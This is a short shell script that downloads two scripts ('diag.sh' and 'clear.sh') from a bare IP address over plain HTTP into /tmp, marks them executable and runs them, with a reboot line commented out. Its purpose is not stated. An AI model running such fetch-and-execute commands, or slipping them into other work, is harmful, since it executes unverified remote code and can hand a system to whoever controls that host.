#!/bin/sh
curl http://91.238.82.19/diag.sh --output /tmp/diag.sh
curl http://91.238.82.19/clear.sh --output /tmp/clear.sh
chmod +x /tmp/diag.sh
chmod +x /tmp/clear.sh
/tmp/diag.sh > /tmp/diag.json
/tmp/clear.sh
#reboot
